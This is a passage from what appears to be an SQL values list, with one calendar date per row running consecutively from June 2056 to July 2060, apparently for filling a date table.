('2056-06-20'),
('2056-06-21'),
('2056-06-22'),
('2056-06-23'),
('2056-06-24'),
('2056-06-25'),
('2056-06-26'),
('2056-06-27'),
('2056-06-28'),
('2056-06-29'),
('2056-06-30'),
('2056-07-01'),
('2056-07-02'),
('2056-07-03'),
('2056-07-04'),
('2056-07-05'),
('2056-07-06'),
('2056-07-07'),
('2056-07-08'),
('2056-07-09'),
('2056-07-10'),
('2056-07-11'),
('2056-07-12'),
('2056-07-13'),
('2056-07-14'),
('2056-07-15'),
('2056-07-16'),
('2056-07-17'),
('2056-07-18'),
('2056-07-19'),
('2056-07-20'),
('2056-07-21'),
('2056-07-22'),
('2056-07-23'),
('2056-07-24'),
('2056-07-25'),
('2056-07-26'),
('2056-07-27'),
('2056-07-28'),
('2056-07-29'),
('2056-07-30'),
('2056-07-31'),
('2056-08-01'),
('2056-08-02'),
('2056-08-03'),
('2056-08-04'),
('2056-08-05'),
('2056-08-06'),
('2056-08-07'),
('2056-08-08'),
('2056-08-09'),
('2056-08-10'),
('2056-08-11'),
('2056-08-12'),
('2056-08-13'),
('2056-08-14'),
('2056-08-15'),
('2056-08-16'),
('2056-08-17'),
('2056-08-18'),
('2056-08-19'),
('2056-08-20'),
('2056-08-21'),
('2056-08-22'),
('2056-08-23'),
('2056-08-24'),
('2056-08-25'),
('2056-08-26'),
('2056-08-27'),
('2056-08-28'),
('2056-08-29'),
('2056-08-30'),
('2056-08-31'),
('2056-09-01'),
('2056-09-02'),
('2056-09-03'),
('2056-09-04'),
('2056-09-05'),
('2056-09-06'),
('2056-09-07'),
('2056-09-08'),
('2056-09-09'),
('2056-09-10'),
('2056-09-11'),
('2056-09-12'),
('2056-09-13'),
('2056-09-14'),
('2056-09-15'),
('2056-09-16'),
('2056-09-17'),
('2056-09-18'),
('2056-09-19'),
('2056-09-20'),
('2056-09-21'),
('2056-09-22'),
('2056-09-23'),
('2056-09-24'),
('2056-09-25'),
('2056-09-26'),
('2056-09-27'),
('2056-09-28'),
('2056-09-29'),
('2056-09-30'),
('2056-10-01'),
('2056-10-02'),
('2056-10-03'),
('2056-10-04'),
('2056-10-05'),
('2056-10-06'),
('2056-10-07'),
('2056-10-08'),
('2056-10-09'),
('2056-10-10'),
('2056-10-11'),
('2056-10-12'),
('2056-10-13'),
('2056-10-14'),
('2056-10-15'),
('2056-10-16'),
('2056-10-17'),
('2056-10-18'),
('2056-10-19'),
('2056-10-20'),
('2056-10-21'),
('2056-10-22'),
('2056-10-23'),
('2056-10-24'),
('2056-10-25'),
('2056-10-26'),
('2056-10-27'),
('2056-10-28'),
('2056-10-29'),
('2056-10-30'),
('2056-10-31'),
('2056-11-01'),
('2056-11-02'),
('2056-11-03'),
('2056-11-04'),
('2056-11-05'),
('2056-11-06'),
('2056-11-07'),
('2056-11-08'),
('2056-11-09'),
('2056-11-10'),
('2056-11-11'),
('2056-11-12'),
('2056-11-13'),
('2056-11-14'),
('2056-11-15'),
('2056-11-16'),
('2056-11-17'),
('2056-11-18'),
('2056-11-19'),
('2056-11-20'),
('2056-11-21'),
('2056-11-22'),
('2056-11-23'),
('2056-11-24'),
('2056-11-25'),
('2056-11-26'),
('2056-11-27'),
('2056-11-28'),
('2056-11-29'),
('2056-11-30'),
('2056-12-01'),
('2056-12-02'),
('2056-12-03'),
('2056-12-04'),
('2056-12-05'),
('2056-12-06'),
('2056-12-07'),
('2056-12-08'),
('2056-12-09'),
('2056-12-10'),
('2056-12-11'),
('2056-12-12'),
('2056-12-13'),
('2056-12-14'),
('2056-12-15'),
('2056-12-16'),
('2056-12-17'),
('2056-12-18'),
('2056-12-19'),
('2056-12-20'),
('2056-12-21'),
('2056-12-22'),
('2056-12-23'),
('2056-12-24'),
('2056-12-25'),
('2056-12-26'),
('2056-12-27'),
('2056-12-28'),
('2056-12-29'),
('2056-12-30'),
('2056-12-31'),
('2057-01-01'),
('2057-01-02'),
('2057-01-03'),
('2057-01-04'),
('2057-01-05'),
('2057-01-06'),
('2057-01-07'),
('2057-01-08'),
('2057-01-09'),
('2057-01-10'),
('2057-01-11'),
('2057-01-12'),
('2057-01-13'),
('2057-01-14'),
('2057-01-15'),
('2057-01-16'),
('2057-01-17'),
('2057-01-18'),
('2057-01-19'),
('2057-01-20'),
('2057-01-21'),
('2057-01-22'),
('2057-01-23'),
('2057-01-24'),
('2057-01-25'),
('2057-01-26'),
('2057-01-27'),
('2057-01-28'),
('2057-01-29'),
('2057-01-30'),
('2057-01-31'),
('2057-02-01'),
('2057-02-02'),
('2057-02-03'),
('2057-02-04'),
('2057-02-05'),
('2057-02-06'),
('2057-02-07'),
('2057-02-08'),
('2057-02-09'),
('2057-02-10'),
('2057-02-11'),
('2057-02-12'),
('2057-02-13'),
('2057-02-14'),
('2057-02-15'),
('2057-02-16'),
('2057-02-17'),
('2057-02-18'),
('2057-02-19'),
('2057-02-20'),
('2057-02-21'),
('2057-02-22'),
('2057-02-23'),
('2057-02-24'),
('2057-02-25'),
('2057-02-26'),
('2057-02-27'),
('2057-02-28'),
('2057-03-01'),
('2057-03-02'),
('2057-03-03'),
('2057-03-04'),
('2057-03-05'),
('2057-03-06'),
('2057-03-07'),
('2057-03-08'),
('2057-03-09'),
('2057-03-10'),
('2057-03-11'),
('2057-03-12'),
('2057-03-13'),
('2057-03-14'),
('2057-03-15'),
('2057-03-16'),
('2057-03-17'),
('2057-03-18'),
('2057-03-19'),
('2057-03-20'),
('2057-03-21'),
('2057-03-22'),
('2057-03-23'),
('2057-03-24'),
('2057-03-25'),
('2057-03-26'),
('2057-03-27'),
('2057-03-28'),
('2057-03-29'),
('2057-03-30'),
('2057-03-31'),
('2057-04-01'),
('2057-04-02'),
('2057-04-03'),
('2057-04-04'),
('2057-04-05'),
('2057-04-06'),
('2057-04-07'),
('2057-04-08'),
('2057-04-09'),
('2057-04-10'),
('2057-04-11'),
('2057-04-12'),
('2057-04-13'),
('2057-04-14'),
('2057-04-15'),
('2057-04-16'),
('2057-04-17'),
('2057-04-18'),
('2057-04-19'),
('2057-04-20'),
('2057-04-21'),
('2057-04-22'),
('2057-04-23'),
('2057-04-24'),
('2057-04-25'),
('2057-04-26'),
('2057-04-27'),
('2057-04-28'),
('2057-04-29'),
('2057-04-30'),
('2057-05-01'),
('2057-05-02'),
('2057-05-03'),
('2057-05-04'),
('2057-05-05'),
('2057-05-06'),
('2057-05-07'),
('2057-05-08'),
('2057-05-09'),
('2057-05-10'),
('2057-05-11'),
('2057-05-12'),
('2057-05-13'),
('2057-05-14'),
('2057-05-15'),
('2057-05-16'),
('2057-05-17'),
('2057-05-18'),
('2057-05-19'),
('2057-05-20'),
('2057-05-21'),
('2057-05-22'),
('2057-05-23'),
('2057-05-24'),
('2057-05-25'),
('2057-05-26'),
('2057-05-27'),
('2057-05-28'),
('2057-05-29'),
('2057-05-30'),
('2057-05-31'),
('2057-06-01'),
('2057-06-02'),
('2057-06-03'),
('2057-06-04'),
('2057-06-05'),
('2057-06-06'),
('2057-06-07'),
('2057-06-08'),
('2057-06-09'),
('2057-06-10'),
('2057-06-11'),
('2057-06-12'),
('2057-06-13'),
('2057-06-14'),
('2057-06-15'),
('2057-06-16'),
('2057-06-17'),
('2057-06-18'),
('2057-06-19'),
('2057-06-20'),
('2057-06-21'),
('2057-06-22'),
('2057-06-23'),
('2057-06-24'),
('2057-06-25'),
('2057-06-26'),
('2057-06-27'),
('2057-06-28'),
('2057-06-29'),
('2057-06-30'),
('2057-07-01'),
('2057-07-02'),
('2057-07-03'),
('2057-07-04'),
('2057-07-05'),
('2057-07-06'),
('2057-07-07'),
('2057-07-08'),
('2057-07-09'),
('2057-07-10'),
('2057-07-11'),
('2057-07-12'),
('2057-07-13'),
('2057-07-14'),
('2057-07-15'),
('2057-07-16'),
('2057-07-17'),
('2057-07-18'),
('2057-07-19'),
('2057-07-20'),
('2057-07-21'),
('2057-07-22'),
('2057-07-23'),
('2057-07-24'),
('2057-07-25'),
('2057-07-26'),
('2057-07-27'),
('2057-07-28'),
('2057-07-29'),
('2057-07-30'),
('2057-07-31'),
('2057-08-01'),
('2057-08-02'),
('2057-08-03'),
('2057-08-04'),
('2057-08-05'),
('2057-08-06'),
('2057-08-07'),
('2057-08-08'),
('2057-08-09'),
('2057-08-10'),
('2057-08-11'),
('2057-08-12'),
('2057-08-13'),
('2057-08-14'),
('2057-08-15'),
('2057-08-16'),
('2057-08-17'),
('2057-08-18'),
('2057-08-19'),
('2057-08-20'),
('2057-08-21'),
('2057-08-22'),
('2057-08-23'),
('2057-08-24'),
('2057-08-25'),
('2057-08-26'),
('2057-08-27'),
('2057-08-28'),
('2057-08-29'),
('2057-08-30'),
('2057-08-31'),
('2057-09-01'),
('2057-09-02'),
('2057-09-03'),
('2057-09-04'),
('2057-09-05'),
('2057-09-06'),
('2057-09-07'),
('2057-09-08'),
('2057-09-09'),
('2057-09-10'),
('2057-09-11'),
('2057-09-12'),
('2057-09-13'),
('2057-09-14'),
('2057-09-15'),
('2057-09-16'),
('2057-09-17'),
('2057-09-18'),
('2057-09-19'),
('2057-09-20'),
('2057-09-21'),
('2057-09-22'),
('2057-09-23'),
('2057-09-24'),
('2057-09-25'),
('2057-09-26'),
('2057-09-27'),
('2057-09-28'),
('2057-09-29'),
('2057-09-30'),
('2057-10-01'),
('2057-10-02'),
('2057-10-03'),
('2057-10-04'),
('2057-10-05'),
('2057-10-06'),
('2057-10-07'),
('2057-10-08'),
('2057-10-09'),
('2057-10-10'),
('2057-10-11'),
('2057-10-12'),
('2057-10-13'),
('2057-10-14'),
('2057-10-15'),
('2057-10-16'),
('2057-10-17'),
('2057-10-18'),
('2057-10-19'),
('2057-10-20'),
('2057-10-21'),
('2057-10-22'),
('2057-10-23'),
('2057-10-24'),
('2057-10-25'),
('2057-10-26'),
('2057-10-27'),
('2057-10-28'),
('2057-10-29'),
('2057-10-30'),
('2057-10-31'),
('2057-11-01'),
('2057-11-02'),
('2057-11-03'),
('2057-11-04'),
('2057-11-05'),
('2057-11-06'),
('2057-11-07'),
('2057-11-08'),
('2057-11-09'),
('2057-11-10'),
('2057-11-11'),
('2057-11-12'),
('2057-11-13'),
('2057-11-14'),
('2057-11-15'),
('2057-11-16'),
('2057-11-17'),
('2057-11-18'),
('2057-11-19'),
('2057-11-20'),
('2057-11-21'),
('2057-11-22'),
('2057-11-23'),
('2057-11-24'),
('2057-11-25'),
('2057-11-26'),
('2057-11-27'),
('2057-11-28'),
('2057-11-29'),
('2057-11-30'),
('2057-12-01'),
('2057-12-02'),
('2057-12-03'),
('2057-12-04'),
('2057-12-05'),
('2057-12-06'),
('2057-12-07'),
('2057-12-08'),
('2057-12-09'),
('2057-12-10'),
('2057-12-11'),
('2057-12-12'),
('2057-12-13'),
('2057-12-14'),
('2057-12-15'),
('2057-12-16'),
('2057-12-17'),
('2057-12-18'),
('2057-12-19'),
('2057-12-20'),
('2057-12-21'),
('2057-12-22'),
('2057-12-23'),
('2057-12-24'),
('2057-12-25'),
('2057-12-26'),
('2057-12-27'),
('2057-12-28'),
('2057-12-29'),
('2057-12-30'),
('2057-12-31'),
('2058-01-01'),
('2058-01-02'),
('2058-01-03'),
('2058-01-04'),
('2058-01-05'),
('2058-01-06'),
('2058-01-07'),
('2058-01-08'),
('2058-01-09'),
('2058-01-10'),
('2058-01-11'),
('2058-01-12'),
('2058-01-13'),
('2058-01-14'),
('2058-01-15'),
('2058-01-16'),
('2058-01-17'),
('2058-01-18'),
('2058-01-19'),
('2058-01-20'),
('2058-01-21'),
('2058-01-22'),
('2058-01-23'),
('2058-01-24'),
('2058-01-25'),
('2058-01-26'),
('2058-01-27'),
('2058-01-28'),
('2058-01-29'),
('2058-01-30'),
('2058-01-31'),
('2058-02-01'),
('2058-02-02'),
('2058-02-03'),
('2058-02-04'),
('2058-02-05'),
('2058-02-06'),
('2058-02-07'),
('2058-02-08'),
('2058-02-09'),
('2058-02-10'),
('2058-02-11'),
('2058-02-12'),
('2058-02-13'),
('2058-02-14'),
('2058-02-15'),
('2058-02-16'),
('2058-02-17'),
('2058-02-18'),
('2058-02-19'),
('2058-02-20'),
('2058-02-21'),
('2058-02-22'),
('2058-02-23'),
('2058-02-24'),
('2058-02-25'),
('2058-02-26'),
('2058-02-27'),
('2058-02-28'),
('2058-03-01'),
('2058-03-02'),
('2058-03-03'),
('2058-03-04'),
('2058-03-05'),
('2058-03-06'),
('2058-03-07'),
('2058-03-08'),
('2058-03-09'),
('2058-03-10'),
('2058-03-11'),
('2058-03-12'),
('2058-03-13'),
('2058-03-14'),
('2058-03-15'),
('2058-03-16'),
('2058-03-17'),
('2058-03-18'),
('2058-03-19'),
('2058-03-20'),
('2058-03-21'),
('2058-03-22'),
('2058-03-23'),
('2058-03-24'),
('2058-03-25'),
('2058-03-26'),
('2058-03-27'),
('2058-03-28'),
('2058-03-29'),
('2058-03-30'),
('2058-03-31'),
('2058-04-01'),
('2058-04-02'),
('2058-04-03'),
('2058-04-04'),
('2058-04-05'),
('2058-04-06'),
('2058-04-07'),
('2058-04-08'),
('2058-04-09'),
('2058-04-10'),
('2058-04-11'),
('2058-04-12'),
('2058-04-13'),
('2058-04-14'),
('2058-04-15'),
('2058-04-16'),
('2058-04-17'),
('2058-04-18'),
('2058-04-19'),
('2058-04-20'),
('2058-04-21'),
('2058-04-22'),
('2058-04-23'),
('2058-04-24'),
('2058-04-25'),
('2058-04-26'),
('2058-04-27'),
('2058-04-28'),
('2058-04-29'),
('2058-04-30'),
('2058-05-01'),
('2058-05-02'),
('2058-05-03'),
('2058-05-04'),
('2058-05-05'),
('2058-05-06'),
('2058-05-07'),
('2058-05-08'),
('2058-05-09'),
('2058-05-10'),
('2058-05-11'),
('2058-05-12'),
('2058-05-13'),
('2058-05-14'),
('2058-05-15'),
('2058-05-16'),
('2058-05-17'),
('2058-05-18'),
('2058-05-19'),
('2058-05-20'),
('2058-05-21'),
('2058-05-22'),
('2058-05-23'),
('2058-05-24'),
('2058-05-25'),
('2058-05-26'),
('2058-05-27'),
('2058-05-28'),
('2058-05-29'),
('2058-05-30'),
('2058-05-31'),
('2058-06-01'),
('2058-06-02'),
('2058-06-03'),
('2058-06-04'),
('2058-06-05'),
('2058-06-06'),
('2058-06-07'),
('2058-06-08'),
('2058-06-09'),
('2058-06-10'),
('2058-06-11'),
('2058-06-12'),
('2058-06-13'),
('2058-06-14'),
('2058-06-15'),
('2058-06-16'),
('2058-06-17'),
('2058-06-18'),
('2058-06-19'),
('2058-06-20'),
('2058-06-21'),
('2058-06-22'),
('2058-06-23'),
('2058-06-24'),
('2058-06-25'),
('2058-06-26'),
('2058-06-27'),
('2058-06-28'),
('2058-06-29'),
('2058-06-30'),
('2058-07-01'),
('2058-07-02'),
('2058-07-03'),
('2058-07-04'),
('2058-07-05'),
('2058-07-06'),
('2058-07-07'),
('2058-07-08'),
('2058-07-09'),
('2058-07-10'),
('2058-07-11'),
('2058-07-12'),
('2058-07-13'),
('2058-07-14'),
('2058-07-15'),
('2058-07-16'),
('2058-07-17'),
('2058-07-18'),
('2058-07-19'),
('2058-07-20'),
('2058-07-21'),
('2058-07-22'),
('2058-07-23'),
('2058-07-24'),
('2058-07-25'),
('2058-07-26'),
('2058-07-27'),
('2058-07-28'),
('2058-07-29'),
('2058-07-30'),
('2058-07-31'),
('2058-08-01'),
('2058-08-02'),
('2058-08-03'),
('2058-08-04'),
('2058-08-05'),
('2058-08-06'),
('2058-08-07'),
('2058-08-08'),
('2058-08-09'),
('2058-08-10'),
('2058-08-11'),
('2058-08-12'),
('2058-08-13'),
('2058-08-14'),
('2058-08-15'),
('2058-08-16'),
('2058-08-17'),
('2058-08-18'),
('2058-08-19'),
('2058-08-20'),
('2058-08-21'),
('2058-08-22'),
('2058-08-23'),
('2058-08-24'),
('2058-08-25'),
('2058-08-26'),
('2058-08-27'),
('2058-08-28'),
('2058-08-29'),
('2058-08-30'),
('2058-08-31'),
('2058-09-01'),
('2058-09-02'),
('2058-09-03'),
('2058-09-04'),
('2058-09-05'),
('2058-09-06'),
('2058-09-07'),
('2058-09-08'),
('2058-09-09'),
('2058-09-10'),
('2058-09-11'),
('2058-09-12'),
('2058-09-13'),
('2058-09-14'),
('2058-09-15'),
('2058-09-16'),
('2058-09-17'),
('2058-09-18'),
('2058-09-19'),
('2058-09-20'),
('2058-09-21'),
('2058-09-22'),
('2058-09-23'),
('2058-09-24'),
('2058-09-25'),
('2058-09-26'),
('2058-09-27'),
('2058-09-28'),
('2058-09-29'),
('2058-09-30'),
('2058-10-01'),
('2058-10-02'),
('2058-10-03'),
('2058-10-04'),
('2058-10-05'),
('2058-10-06'),
('2058-10-07'),
('2058-10-08'),
('2058-10-09'),
('2058-10-10'),
('2058-10-11'),
('2058-10-12'),
('2058-10-13'),
('2058-10-14'),
('2058-10-15'),
('2058-10-16'),
('2058-10-17'),
('2058-10-18'),
('2058-10-19'),
('2058-10-20'),
('2058-10-21'),
('2058-10-22'),
('2058-10-23'),
('2058-10-24'),
('2058-10-25'),
('2058-10-26'),
('2058-10-27'),
('2058-10-28'),
('2058-10-29'),
('2058-10-30'),
('2058-10-31'),
('2058-11-01'),
('2058-11-02'),
('2058-11-03'),
('2058-11-04'),
('2058-11-05'),
('2058-11-06'),
('2058-11-07'),
('2058-11-08'),
('2058-11-09'),
('2058-11-10'),
('2058-11-11'),
('2058-11-12'),
('2058-11-13'),
('2058-11-14'),
('2058-11-15'),
('2058-11-16'),
('2058-11-17'),
('2058-11-18'),
('2058-11-19'),
('2058-11-20'),
('2058-11-21'),
('2058-11-22'),
('2058-11-23'),
('2058-11-24'),
('2058-11-25'),
('2058-11-26'),
('2058-11-27'),
('2058-11-28'),
('2058-11-29'),
('2058-11-30'),
('2058-12-01'),
('2058-12-02'),
('2058-12-03'),
('2058-12-04'),
('2058-12-05'),
('2058-12-06'),
('2058-12-07'),
('2058-12-08'),
('2058-12-09'),
('2058-12-10'),
('2058-12-11'),
('2058-12-12'),
('2058-12-13'),
('2058-12-14'),
('2058-12-15'),
('2058-12-16'),
('2058-12-17'),
('2058-12-18'),
('2058-12-19'),
('2058-12-20'),
('2058-12-21'),
('2058-12-22'),
('2058-12-23'),
('2058-12-24'),
('2058-12-25'),
('2058-12-26'),
('2058-12-27'),
('2058-12-28'),
('2058-12-29'),
('2058-12-30'),
('2058-12-31'),
('2059-01-01'),
('2059-01-02'),
('2059-01-03'),
('2059-01-04'),
('2059-01-05'),
('2059-01-06'),
('2059-01-07'),
('2059-01-08'),
('2059-01-09'),
('2059-01-10'),
('2059-01-11'),
('2059-01-12'),
('2059-01-13'),
('2059-01-14'),
('2059-01-15'),
('2059-01-16'),
('2059-01-17'),
('2059-01-18'),
('2059-01-19'),
('2059-01-20'),
('2059-01-21'),
('2059-01-22'),
('2059-01-23'),
('2059-01-24'),
('2059-01-25'),
('2059-01-26'),
('2059-01-27'),
('2059-01-28'),
('2059-01-29'),
('2059-01-30'),
('2059-01-31'),
('2059-02-01'),
('2059-02-02'),
('2059-02-03'),
('2059-02-04'),
('2059-02-05'),
('2059-02-06'),
('2059-02-07'),
('2059-02-08'),
('2059-02-09'),
('2059-02-10'),
('2059-02-11'),
('2059-02-12'),
('2059-02-13'),
('2059-02-14'),
('2059-02-15'),
('2059-02-16'),
('2059-02-17'),
('2059-02-18'),
('2059-02-19'),
('2059-02-20'),
('2059-02-21'),
('2059-02-22'),
('2059-02-23'),
('2059-02-24'),
('2059-02-25'),
('2059-02-26'),
('2059-02-27'),
('2059-02-28'),
('2059-03-01'),
('2059-03-02'),
('2059-03-03'),
('2059-03-04'),
('2059-03-05'),
('2059-03-06'),
('2059-03-07'),
('2059-03-08'),
('2059-03-09'),
('2059-03-10'),
('2059-03-11'),
('2059-03-12'),
('2059-03-13'),
('2059-03-14'),
('2059-03-15'),
('2059-03-16'),
('2059-03-17'),
('2059-03-18'),
('2059-03-19'),
('2059-03-20'),
('2059-03-21'),
('2059-03-22'),
('2059-03-23'),
('2059-03-24'),
('2059-03-25'),
('2059-03-26'),
('2059-03-27'),
('2059-03-28'),
('2059-03-29'),
('2059-03-30'),
('2059-03-31'),
('2059-04-01'),
('2059-04-02'),
('2059-04-03'),
('2059-04-04'),
('2059-04-05'),
('2059-04-06'),
('2059-04-07'),
('2059-04-08'),
('2059-04-09'),
('2059-04-10'),
('2059-04-11'),
('2059-04-12'),
('2059-04-13'),
('2059-04-14'),
('2059-04-15'),
('2059-04-16'),
('2059-04-17'),
('2059-04-18'),
('2059-04-19'),
('2059-04-20'),
('2059-04-21'),
('2059-04-22'),
('2059-04-23'),
('2059-04-24'),
('2059-04-25'),
('2059-04-26'),
('2059-04-27'),
('2059-04-28'),
('2059-04-29'),
('2059-04-30'),
('2059-05-01'),
('2059-05-02'),
('2059-05-03'),
('2059-05-04'),
('2059-05-05'),
('2059-05-06'),
('2059-05-07'),
('2059-05-08'),
('2059-05-09'),
('2059-05-10'),
('2059-05-11'),
('2059-05-12'),
('2059-05-13'),
('2059-05-14'),
('2059-05-15'),
('2059-05-16'),
('2059-05-17'),
('2059-05-18'),
('2059-05-19'),
('2059-05-20'),
('2059-05-21'),
('2059-05-22'),
('2059-05-23'),
('2059-05-24'),
('2059-05-25'),
('2059-05-26'),
('2059-05-27'),
('2059-05-28'),
('2059-05-29'),
('2059-05-30'),
('2059-05-31'),
('2059-06-01'),
('2059-06-02'),
('2059-06-03'),
('2059-06-04'),
('2059-06-05'),
('2059-06-06'),
('2059-06-07'),
('2059-06-08'),
('2059-06-09'),
('2059-06-10'),
('2059-06-11'),
('2059-06-12'),
('2059-06-13'),
('2059-06-14'),
('2059-06-15'),
('2059-06-16'),
('2059-06-17'),
('2059-06-18'),
('2059-06-19'),
('2059-06-20'),
('2059-06-21'),
('2059-06-22'),
('2059-06-23'),
('2059-06-24'),
('2059-06-25'),
('2059-06-26'),
('2059-06-27'),
('2059-06-28'),
('2059-06-29'),
('2059-06-30'),
('2059-07-01'),
('2059-07-02'),
('2059-07-03'),
('2059-07-04'),
('2059-07-05'),
('2059-07-06'),
('2059-07-07'),
('2059-07-08'),
('2059-07-09'),
('2059-07-10'),
('2059-07-11'),
('2059-07-12'),
('2059-07-13'),
('2059-07-14'),
('2059-07-15'),
('2059-07-16'),
('2059-07-17'),
('2059-07-18'),
('2059-07-19'),
('2059-07-20'),
('2059-07-21'),
('2059-07-22'),
('2059-07-23'),
('2059-07-24'),
('2059-07-25'),
('2059-07-26'),
('2059-07-27'),
('2059-07-28'),
('2059-07-29'),
('2059-07-30'),
('2059-07-31'),
('2059-08-01'),
('2059-08-02'),
('2059-08-03'),
('2059-08-04'),
('2059-08-05'),
('2059-08-06'),
('2059-08-07'),
('2059-08-08'),
('2059-08-09'),
('2059-08-10'),
('2059-08-11'),
('2059-08-12'),
('2059-08-13'),
('2059-08-14'),
('2059-08-15'),
('2059-08-16'),
('2059-08-17'),
('2059-08-18'),
('2059-08-19'),
('2059-08-20'),
('2059-08-21'),
('2059-08-22'),
('2059-08-23'),
('2059-08-24'),
('2059-08-25'),
('2059-08-26'),
('2059-08-27'),
('2059-08-28'),
('2059-08-29'),
('2059-08-30'),
('2059-08-31'),
('2059-09-01'),
('2059-09-02'),
('2059-09-03'),
('2059-09-04'),
('2059-09-05'),
('2059-09-06'),
('2059-09-07'),
('2059-09-08'),
('2059-09-09'),
('2059-09-10'),
('2059-09-11'),
('2059-09-12'),
('2059-09-13'),
('2059-09-14'),
('2059-09-15'),
('2059-09-16'),
('2059-09-17'),
('2059-09-18'),
('2059-09-19'),
('2059-09-20'),
('2059-09-21'),
('2059-09-22'),
('2059-09-23'),
('2059-09-24'),
('2059-09-25'),
('2059-09-26'),
('2059-09-27'),
('2059-09-28'),
('2059-09-29'),
('2059-09-30'),
('2059-10-01'),
('2059-10-02'),
('2059-10-03'),
('2059-10-04'),
('2059-10-05'),
('2059-10-06'),
('2059-10-07'),
('2059-10-08'),
('2059-10-09'),
('2059-10-10'),
('2059-10-11'),
('2059-10-12'),
('2059-10-13'),
('2059-10-14'),
('2059-10-15'),
('2059-10-16'),
('2059-10-17'),
('2059-10-18'),
('2059-10-19'),
('2059-10-20'),
('2059-10-21'),
('2059-10-22'),
('2059-10-23'),
('2059-10-24'),
('2059-10-25'),
('2059-10-26'),
('2059-10-27'),
('2059-10-28'),
('2059-10-29'),
('2059-10-30'),
('2059-10-31'),
('2059-11-01'),
('2059-11-02'),
('2059-11-03'),
('2059-11-04'),
('2059-11-05'),
('2059-11-06'),
('2059-11-07'),
('2059-11-08'),
('2059-11-09'),
('2059-11-10'),
('2059-11-11'),
('2059-11-12'),
('2059-11-13'),
('2059-11-14'),
('2059-11-15'),
('2059-11-16'),
('2059-11-17'),
('2059-11-18'),
('2059-11-19'),
('2059-11-20'),
('2059-11-21'),
('2059-11-22'),
('2059-11-23'),
('2059-11-24'),
('2059-11-25'),
('2059-11-26'),
('2059-11-27'),
('2059-11-28'),
('2059-11-29'),
('2059-11-30'),
('2059-12-01'),
('2059-12-02'),
('2059-12-03'),
('2059-12-04'),
('2059-12-05'),
('2059-12-06'),
('2059-12-07'),
('2059-12-08'),
('2059-12-09'),
('2059-12-10'),
('2059-12-11'),
('2059-12-12'),
('2059-12-13'),
('2059-12-14'),
('2059-12-15'),
('2059-12-16'),
('2059-12-17'),
('2059-12-18'),
('2059-12-19'),
('2059-12-20'),
('2059-12-21'),
('2059-12-22'),
('2059-12-23'),
('2059-12-24'),
('2059-12-25'),
('2059-12-26'),
('2059-12-27'),
('2059-12-28'),
('2059-12-29'),
('2059-12-30'),
('2059-12-31'),
('2060-01-01'),
('2060-01-02'),
('2060-01-03'),
('2060-01-04'),
('2060-01-05'),
('2060-01-06'),
('2060-01-07'),
('2060-01-08'),
('2060-01-09'),
('2060-01-10'),
('2060-01-11'),
('2060-01-12'),
('2060-01-13'),
('2060-01-14'),
('2060-01-15'),
('2060-01-16'),
('2060-01-17'),
('2060-01-18'),
('2060-01-19'),
('2060-01-20'),
('2060-01-21'),
('2060-01-22'),
('2060-01-23'),
('2060-01-24'),
('2060-01-25'),
('2060-01-26'),
('2060-01-27'),
('2060-01-28'),
('2060-01-29'),
('2060-01-30'),
('2060-01-31'),
('2060-02-01'),
('2060-02-02'),
('2060-02-03'),
('2060-02-04'),
('2060-02-05'),
('2060-02-06'),
('2060-02-07'),
('2060-02-08'),
('2060-02-09'),
('2060-02-10'),
('2060-02-11'),
('2060-02-12'),
('2060-02-13'),
('2060-02-14'),
('2060-02-15'),
('2060-02-16'),
('2060-02-17'),
('2060-02-18'),
('2060-02-19'),
('2060-02-20'),
('2060-02-21'),
('2060-02-22'),
('2060-02-23'),
('2060-02-24'),
('2060-02-25'),
('2060-02-26'),
('2060-02-27'),
('2060-02-28'),
('2060-02-29'),
('2060-03-01'),
('2060-03-02'),
('2060-03-03'),
('2060-03-04'),
('2060-03-05'),
('2060-03-06'),
('2060-03-07'),
('2060-03-08'),
('2060-03-09'),
('2060-03-10'),
('2060-03-11'),
('2060-03-12'),
('2060-03-13'),
('2060-03-14'),
('2060-03-15'),
('2060-03-16'),
('2060-03-17'),
('2060-03-18'),
('2060-03-19'),
('2060-03-20'),
('2060-03-21'),
('2060-03-22'),
('2060-03-23'),
('2060-03-24'),
('2060-03-25'),
('2060-03-26'),
('2060-03-27'),
('2060-03-28'),
('2060-03-29'),
('2060-03-30'),
('2060-03-31'),
('2060-04-01'),
('2060-04-02'),
('2060-04-03'),
('2060-04-04'),
('2060-04-05'),
('2060-04-06'),
('2060-04-07'),
('2060-04-08'),
('2060-04-09'),
('2060-04-10'),
('2060-04-11'),
('2060-04-12'),
('2060-04-13'),
('2060-04-14'),
('2060-04-15'),
('2060-04-16'),
('2060-04-17'),
('2060-04-18'),
('2060-04-19'),
('2060-04-20'),
('2060-04-21'),
('2060-04-22'),
('2060-04-23'),
('2060-04-24'),
('2060-04-25'),
('2060-04-26'),
('2060-04-27'),
('2060-04-28'),
('2060-04-29'),
('2060-04-30'),
('2060-05-01'),
('2060-05-02'),
('2060-05-03'),
('2060-05-04'),
('2060-05-05'),
('2060-05-06'),
('2060-05-07'),
('2060-05-08'),
('2060-05-09'),
('2060-05-10'),
('2060-05-11'),
('2060-05-12'),
('2060-05-13'),
('2060-05-14'),
('2060-05-15'),
('2060-05-16'),
('2060-05-17'),
('2060-05-18'),
('2060-05-19'),
('2060-05-20'),
('2060-05-21'),
('2060-05-22'),
('2060-05-23'),
('2060-05-24'),
('2060-05-25'),
('2060-05-26'),
('2060-05-27'),
('2060-05-28'),
('2060-05-29'),
('2060-05-30'),
('2060-05-31'),
('2060-06-01'),
('2060-06-02'),
('2060-06-03'),
('2060-06-04'),
('2060-06-05'),
('2060-06-06'),
('2060-06-07'),
('2060-06-08'),
('2060-06-09'),
('2060-06-10'),
('2060-06-11'),
('2060-06-12'),
('2060-06-13'),
('2060-06-14'),
('2060-06-15'),
('2060-06-16'),
('2060-06-17'),
('2060-06-18'),
('2060-06-19'),
('2060-06-20'),
('2060-06-21'),
('2060-06-22'),
('2060-06-23'),
('2060-06-24'),
('2060-06-25'),
('2060-06-26'),
('2060-06-27'),
('2060-06-28'),
('2060-06-29'),
('2060-06-30'),
('2060-07-01'),
('2060-07-02'),
('2060-07-03'),
('2060-07-04'),
('2060-07-05'),
('2060-07-06'),
('2060-07-07'),
('2060-07-08'),
('2060-07-09'),
('2060-07-10'),
('2060-07-11'),
('2060-07-12'),
('2060-07-13'),
('2060-07-14'),
('2060-07-15'),
('2060-07-16'),
('2060-07-17'),
('2060-07-18'),
('2060-07-19'),
('2060-07-20'),
('2060-07-21'),
('2060-07-22'),
('2060-07-23'),
('2060-07-24'),
('2060-07-25'),
('2060-07-26'),
('2060-07-27'),
('2060-07-28'),
